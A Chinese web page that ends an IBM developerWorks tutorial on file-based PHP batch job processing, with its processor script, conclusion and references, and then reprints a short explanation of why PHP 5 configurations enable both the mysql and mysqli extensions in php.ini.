有一点需要注意：除了类名（BatchFiles）之外，实际上没有任何迹象能够说明作业是如何存储的。所以，以后很容易将它改为数据库风格的存储方式，而不需要修改接口。

最后是处理程序的代码。

清单 11. batch_by_file_processor.php
    <?phprequire_once 'batch_by_file.php';function printvalue( $args ) {  echo 'Printing: '.$args['value']."\n";}foreach( BatchFiles::get_all() as $item ) {  call_user_func_array( $item['function'], array( $item['args'] ) );  BatchFiles::delete( $item['id'] );}?>

这段代码几乎与数据库版本完全相同，只是修改了文件名和类名。

回页首

结束语

正如前面提到的，服务器对线程提供了许多支持，可以进行后台批处理。在某些情况下，使用辅助线程处理小作业肯定比较容易。但是，也可以使用传统工具（cron、MySQL、标准的面向对象的 PHP 和 Pear::DB）在 PHP 应用程序中创建批作业，这很容易实现、部署和维护。

参考资料

学习

您可以参阅本文在 developerWorks 全球站点上的英文原文。

阅读 IBM developerWorks 的 PHP 项目资源中心，进一步了解 PHP。

PHP.net 是面向 PHP 开发人员的优秀资源。

PEAR Mail_Queue 包是一个健壮的邮件队列实现，其中包括数据库后端。

crontab 手册提供了 cron 配置的细节，但是不容易理解。

PHP 手册中关于 Using PHP from the command line 的一节可以帮助您了解如何从 cron 运行脚本。

随时关注 developerWorks 技术事件和 webcast。

了解世界各地即将进行的会议、展览、网络广播和其他活动，IBM 开放源码开发人员可以通过这些活动了解最新的技术发展。

访问 developerWorks 开源技术专区，获得广泛的 how-to 信息、工具和项目更新，可以帮助您利用开放源码技术进行开发并将其与 IBM 产品结合使用。

developerWorks podcasts 中包括很多适合于软件开发人员的有趣的访谈和讨论。

获得产品和技术

查阅 PEAR -- PHP Extension and Application Repository，其中包含 Pear::DB。

使用 IBM 试用软件改进您的下一个开放源码开发项目，这些软件可以下载或者通过 DVD 获得。

讨论

developerWorks PHP Developer Forum 为所有 PHP 开发人员提供了讨论技术问题的场所。如果您有关于 PHP 脚本、函数、语法、变量、调试和其他主题的问题，可以在这里提出。

通过参与 developerWorks blog 加入 developerWorks 社区。

关于作者

  Jack D. Herrington 是一名高级软件工程师，具有 20 多年的工作经验。他撰写过三本书： Code Generation in Action 、 Podcasting Hacks 和 PHP Hacks，还撰写了 30 多篇文章。

[3]关于在php.ini中添加extension=php_mysqli.dll指令的说明

来源: 互联网发布时间: 2013-11-30

在配置php5时要使用mysql作为数据库，很多人都认为只要在php.ini中添加extension=php_mysql.dll;指令即可，不清楚为什么很多文章都推荐还要添加extension=php_mysqli.dll;指令。

只要查看官方最新php手册便知，上面写到：

下面是内置的扩展库列表：

PHP 5 中（截止到 5.0.4）有以下修改。新增内置：DOM，LibXML，Iconv，SimpleXML，SPL 和SQLite。以下不再内置：MySQL 和 Overload。

原来php5没有内置这些扩展库（当然也可以得出在使用php4时，不需要添加这些指令），至于为什么php5没有不再绑定mysql的客户端库，手册中也有说明：

部分原因是（无特定顺序）：

。现今大多数系统已经安装了客户端库了。

。由于以上原因，保持多个版本的库文件会导致混乱。例如，如果把 mod_auth_mysql 连接到某个版本，但把 PHP 连接到了另一个版本，然后在 Apache 中同时激活了它们，会得到无数错误。此外，绑定的库文件也不总是能和服务器端的版本很好地配合。对此最明显的症状是上哪里去找 UNIX 域套接字文件 mysql.socket。

。维护有些松懈，并且已经越来越落后于发行的版本了。

。未来的库版本是基于 GPL 的，因此我们没有升级的途径了，因为我们不能将基于 GPL 的库和 BSD/Apache 风格许可证的项目绑定到一起。因此具有一个干净的 PHP 5 是最好的选择。

配置时为php激活两个扩展库的原因是因为：

　　。为了能使用基本函数操作访问mysql数据库服务器，必须在配置php时添加mysql的支持，即使用php_mysql.dll扩展库。

　　。虽然php_mysql.dll扩展库兼容mysql 4.1.0机器以后版本，但是它不支持这些版本提供的额外功能，要使用这些功能，还需要使用php_mysqli.dll扩展库。

PHP 4 中（截止到 PHP 4.3.11）：BCMath，Caledar，COM，Ctype，FTP，MySQL，ODBC，Overload，PCRE，Session，Tokenizer，WDDX，XML 和 Zlib。